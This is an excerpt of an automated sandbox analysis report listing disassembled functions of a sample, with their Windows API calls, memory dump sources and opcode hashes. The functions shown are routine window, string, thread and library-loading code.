                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9f1005f6cc92adc4dcd994b21db5862ec7f1e7ca56d7401f0053398482e97b2a
                                                                                                                                                                                                                                                                  • Instruction ID: ecc48f04d1e9994d6b7aec2a4f449b8f3fc85723aa4de6134c6f0fb47bb9b290
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f1005f6cc92adc4dcd994b21db5862ec7f1e7ca56d7401f0053398482e97b2a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD21B2305083019F8700DF28C88186BB7F9EE5A364F144A1DF499D72A2EB71DD4ADBA2
                                                                                                                                                                                                                                                                  Function 00D7321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00D732A6
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D732C0
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D732CE
                                                                                                                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00D732DC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                  • Opcode ID: b0164ca482f232b185f203548c0a04cf74712a670670c276d8bbcbaf281890b6
                                                                                                                                                                                                                                                                  • Instruction ID: 32b47cbe0d882221443d124bc89507b1c7edc16f6e6db4ce33d216c0901c1d13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0164ca482f232b185f203548c0a04cf74712a670670c276d8bbcbaf281890b6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8121C431204211AFD7149B24C845FAA7BA5EF81314F24C25CF82A8B2D2D771ED81D7E4
                                                                                                                                                                                                                                                                  Function 00D4825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D496E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?), ref: 00D496F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00D496E4: lstrcpyW.KERNEL32(00000000,?,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D49719
                                                                                                                                                                                                                                                                    • Part of subcall function 00D496E4: lstrcmpiW.KERNEL32(00000000,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?), ref: 00D4974A
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D4828A
                                                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D482B0
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D482EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID: cdecl
                                                                                                                                                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                  • Opcode ID: 6b34a330db41a2888896d401ae949855dacd81b762ddb84016b2cc1d148bd852
                                                                                                                                                                                                                                                                  • Instruction ID: 8c973c159c3501c6df6a2274b00fb3daf442c16ba6b5ab2a266619eb38676337
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b34a330db41a2888896d401ae949855dacd81b762ddb84016b2cc1d148bd852
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B111033A200342ABCB149F38C844E7E77A9FF45790B50402AF946C7294EF719801D7B5
                                                                                                                                                                                                                                                                  Function 00D760FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00D7615A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7616C
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D76177
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D762B5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 455545452-0
                                                                                                                                                                                                                                                                  • Opcode ID: 67d46451fb2230e55e98b150bd59b42f1cfd2c8317c3300ce51290f6334be8ca
                                                                                                                                                                                                                                                                  • Instruction ID: 3ee1a82ce6dd0a63177010efd10ce0a8d410ce272b2d68e127cec654f437c77d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d46451fb2230e55e98b150bd59b42f1cfd2c8317c3300ce51290f6334be8ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04118175900618AADB10DF659C88EEF77BCEF11354B18812AFA1DD6181FBB0C944CB71
                                                                                                                                                                                                                                                                  Function 00D12079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 641e09a86df7584900ada0e6a8b4aedc149b8664a8c945ef64dcdec384d442b5
                                                                                                                                                                                                                                                                  • Instruction ID: f9e7072c87992c57e3cc2ffb06e883ba0c50fa8b82601d5ae39bbe236dae2b5c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 641e09a86df7584900ada0e6a8b4aedc149b8664a8c945ef64dcdec384d442b5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A018FB22452167EF6212678BCC1FB7671EDF853B8B380325B521A12D1EE728DE08170
                                                                                                                                                                                                                                                                  Function 00D42374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D42394
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423A6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423BC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423D7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  • Opcode ID: 31d317ba3681fd55fdd1f452b4e9cd72067da1727d348e9d92a74cd56518ef24
                                                                                                                                                                                                                                                                  • Instruction ID: 90be2aa1f8f1357ca00f8077dac11edbb2db086ba2ef3f1162cae3bf22f8ba6b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31d317ba3681fd55fdd1f452b4e9cd72067da1727d348e9d92a74cd56518ef24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45110C36900218FFDB119F95CD89FADBB78FB08750F600095F601B7290D6716E50DBA4
                                                                                                                                                                                                                                                                  Function 00CE1AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CE1AF4
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D231F9
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D23203
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D2320E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                  • Opcode ID: daa6d5ed249cfc344fee8afec8929d1daf48bddc3766da39eba84b6c329863d3
                                                                                                                                                                                                                                                                  • Instruction ID: 786b269196816226a92137472452ef98dab5001aec2cebef910c67fa4e13ba5e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daa6d5ed249cfc344fee8afec8929d1daf48bddc3766da39eba84b6c329863d3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17118C32A01259EBDB00DFA5D8869FE77B9FF05354F040452E916E3240D730BAA1DBB1
                                                                                                                                                                                                                                                                  Function 00D4EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4EB14
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00D4EB47
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D4EB5D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D4EB64
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                  • Opcode ID: 311d01a7d1afadf5ca3cb43e09d1af075734bd942be3c9a8115e694958b20903
                                                                                                                                                                                                                                                                  • Instruction ID: ffb070d427311581888dfbcec91ab0bb81ea4fd9f5d85dbf93474a0046b2eba0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 311d01a7d1afadf5ca3cb43e09d1af075734bd942be3c9a8115e694958b20903
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E118476904358FFDB019BA89C09A9E7FADFF46320F14425AF81AE3391D674894487B1
                                                                                                                                                                                                                                                                  Function 00D0D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,?,00D0D369,00000000,00000004,00000000), ref: 00D0D588
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D0D594
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D0D59B
                                                                                                                                                                                                                                                                  • ResumeThread.KERNEL32(00000000), ref: 00D0D5B9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 173952441-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2495c7eec72e7d19e7fd95267ffb7e670a940319951e916e554074d8822dc9ce
                                                                                                                                                                                                                                                                  • Instruction ID: 02c2c15992f8fb7cb4be9dd2e9f84d9b86e63a7a654cbe1fba34d5f6f6e82279
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2495c7eec72e7d19e7fd95267ffb7e670a940319951e916e554074d8822dc9ce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7901F932404214BBCB206FE5DC09BAA7B6AEF82334F14021AFD2D971E0DF718940C6B1
                                                                                                                                                                                                                                                                  Function 00CE7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9d07683bf723c10460d3f705772ec15564da54eaa2ce47719b8762c5c1872753
                                                                                                                                                                                                                                                                  • Instruction ID: 570f6f43b85ac764e6b1b4037f9deb78f0f3c217bf361d7939ec35348fd27132
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d07683bf723c10460d3f705772ec15564da54eaa2ce47719b8762c5c1872753
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06110472501248BFDF164F91CC48EEA7B6DFF18354F040215FA15A6150D731DCA0EBA0
                                                                                                                                                                                                                                                                  Function 00D133E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue), ref: 00D13418
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue,00D83260,FlsSetValue,00000000,00000364,?,00D131B9), ref: 00D13424
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue,00D83260,FlsSetValue,00000000), ref: 00D13432
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                  • Opcode ID: 73b3c24e1a4fc7694d63c38a38c3ae3bbc3265fb599e96738062a0f619a8c694
                                                                                                                                                                                                                                                                  • Instruction ID: 602fe035d23decd08e587cdb287345208e36adaf58b729d33606f87033ce0e7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73b3c24e1a4fc7694d63c38a38c3ae3bbc3265fb599e96738062a0f619a8c694
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F901FC32611326BBCB324F79BC449D63B69BF04B717240220F90AE7241DB20DD81C6F4
                                                                                                                                                                                                                                                                  Function 00D4BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BA8B
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BAB0
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BABA
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BAED
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                  • Opcode ID: fc6c3e6209d3171ef720809db5e67f4cc121da7b4e34df1d5b76383e742e48d5
                                                                                                                                                                                                                                                                  • Instruction ID: b4cf8419d1da485a7aae4d2001feabce2760d1ef3637ff75747f0b2b223f695b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc6c3e6209d3171ef720809db5e67f4cc121da7b4e34df1d5b76383e742e48d5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28110971D00729E7CF009FA5E94A6EEBB78BF19721F514096D981B2240DBB09650CBB5
                                                                                                                                                                                                                                                                  Function 00D7886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D7888E
